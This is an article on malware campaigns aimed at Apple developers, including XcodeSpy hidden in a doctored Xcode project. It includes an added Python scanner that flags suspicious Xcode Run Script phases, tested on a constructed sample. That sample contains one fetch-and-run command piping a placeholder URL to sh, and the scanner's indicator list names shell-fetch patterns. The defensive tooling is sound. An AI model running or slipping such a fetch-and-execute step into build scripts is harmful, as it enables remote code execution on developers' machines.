Hackers target developers to break into Apple’s garden

Developers should beware, as cybercriminals have figured out that the best attack vectors to infect the Apple ecosystem may be the developers themselves.

Developers, developers, malware writers

We’ve known for a long time that malware makers and other cyber-miscreants are smart. The work they do brings in real money, with a healthy trade in corporate and personal secrets, bank account details, fraud, and ransomware generating a market some say is already worth billions — even as it costs the global economy 1% of GDP.

You can argue about the economic consequences, but there’s little doubt that the move to remote working generated a spike in socially engineered attacks, from fraudulent websites to phishing and beyond. And while the Apple ecosystem has held up well, with the majority of serious incidents stemming from weak user security practices and successful manipulation using traditional attack vectors such as malware-infested emails and website links, the pandemic has also seen the value of that ecosystem grow.

Apple is a tempting target

With 23% of enterprise PCs deployed in 2020 apparently being Macs, Apple’s platforms are becoming keen targets for criminal enterprise. The problem for criminals: Apple’s inherently solid security, along with the capacity to rush security upgrades out to millions of users because of the company’s non-fragmented platforms, makes attacking those platforms quite difficult.

In response, attackers appear to be returning to the drawing board and now seem to be working to inject attacks early on in the process. The way they see it is that if you can’t persuade people to download Apple malware, you need to inject it inside applications users already trust.

XcodeSpy targets developers

The latest illustration of this (“XcodeSpy”) has been identified by a team of security researchers at SentinelOne. They claim to have found an infected code library in the wild that attempts to install malware on Macs used by software developers. It is distributed as a doctored copy of a legitimate open-source Xcode project that developers might use to build animated tab bars.

Once installed, this software quietly executes a script that downloads backdoor software that monitors what the developer does via the microphone, camera and keyboard.

While this sounds pretty rough, it’s no reason for over-reaction. But it should serve as a warning to Apple developers in all walks of life (particularly in enterprise IT) to ensure they are completely certain of what third-party tools and open-source packages they use when building applications.
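One concrete check a developer can run before building an unfamiliar Xcode project: Xcode stores Run Script build phases in project.pbxproj as PBXShellScriptBuildPhase objects, and a script executed at build time, like the one described above, lives in that file. The scanner below is an added example (not code from the article or from SentinelOne’s report); it lists every such phase and flags common indicators worth a second look, and the pbxproj excerpt it runs on is constructed.

```python
import re

# Xcode serialises each Run Script phase as a PBXShellScriptBuildPhase object;
# the script body is the quoted "shellScript" field, with C-style escapes
# (\n, \t, \", \\). Assumes the field is quoted, which it is whenever the
# script contains spaces or newlines.
PHASE_RE = re.compile(
    r'isa = PBXShellScriptBuildPhase;.*?shellScript = "((?:[^"\\]|\\.)*)";',
    re.S,
)

# Indicators a reviewer would want explained in a third-party project:
# remote fetches, payloads decoded or eval'd at build time, detached
# execution and persistence locations. These are hints, not proof.
SUSPICIOUS = {
    "remote fetch": re.compile(r"\b(curl|wget)\b"),
    "piped to shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "decoded payload": re.compile(r"base64\s+(-d|--decode|-D)|\beval\b"),
    "detached run": re.compile(r"\bnohup\b|(?<!&)&\s*$", re.M),
    "persistence path": re.compile(r"LaunchAgents|LaunchDaemons"),
}

_ESCAPES = {"n": "\n", "t": "\t", '"': '"', "\\": "\\"}

def decode_pbx_string(s: str) -> str:
    """Undo pbxproj string escaping in a single pass."""
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), s)

def audit_pbxproj(text: str) -> list[dict]:
    """One finding per Run Script phase: the decoded script and its indicators."""
    findings = []
    for m in PHASE_RE.finditer(text):
        script = decode_pbx_string(m.group(1))
        hits = [name for name, rx in SUSPICIOUS.items() if rx.search(script)]
        findings.append({"script": script, "indicators": hits})
    return findings

# Constructed excerpt: one ordinary lint phase, one phase that fetches and
# runs remote content in the background (placeholder host, not a real URL).
SAMPLE_PBXPROJ = r'''
		AA01 /* Lint */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "if which swiftlint; then swiftlint; fi\n";
		};
		AA02 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "curl -s https://example.invalid/x | sh &\n";
		};
'''

if __name__ == "__main__":
    for i, f in enumerate(audit_pbxproj(SAMPLE_PBXPROJ), 1):
        print(f"phase {i}: {f['indicators'] or 'no indicators'}\n  {f['script'].strip()}")
```

Run it against `YourApp.xcodeproj/project.pbxproj` of any project you did not write yourself; a phase with no indicators still deserves a read, since the heuristics only catch the obvious patterns.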

A rich history of developer attack

ArsTechnica notes another recent incident of malware aimed at developers, when what were thought to be state-sponsored hackers engaged in an extensive campaign to win trust from security researchers via social media to convince them to install malware.

In a sense, the shape of this particular set of security adventures was set in 2015 when hackers introduced XcodeGhost, a version of Apple’s developer tool that was given a little extra zing in the form of built-in malware. Apps built using XcodeGhost all shipped with malware installed. While this attack was mostly confined to the APAC region, it took months for apps containing code built by XcodeGhost to stop circulating.

The logic here makes complete sense. Even in Apple’s curated App Store model, iPhone, iPad, and Mac customers have built a big sense of trust in the way they download and install software.

Indeed, given that Apple continues to add friction to the experience of downloading software from outside its stores, malware makers know that the best way to distribute their wares is via the App Store itself.

This must ultimately be the prize they seek — to build an attack mechanism that silently infects enough developers of legitimate Apple apps so that the apps they then sell via Apple’s store carry malware into devices belonging to millions of users.

Developers are targets, too

This hasn’t happened yet, and I think that Apple’s store security, software code checking, and verification tools mean it may never happen at all. But this is certainly part of what Apple’s customers and developers pay for in their App Store distribution fees.

What makes this of a little more concern is that this latest alert follows just months after TrendMicro warned of a similar attempt to undermine Xcode, again by targeting developers.

The bottom line?

Apple’s highly secure platforms are tough to break, but there’s a big profit motive to try to do so.

Given that the weakest link in any security chain is now and always has been the user, it is no surprise that those with a nose for this kind of security subversion are spending time figuring out how to trick developers into unwittingly becoming their own secret attack vectors.

I think this means developers in the Apple ecosystem will need to security audit their software code repositories a little more often in future, because you have been identified as potentially the weakest link in the security chain.

It would also be a good time to review Apple’s security white papers and this (older, but still useful) Mac security guide.
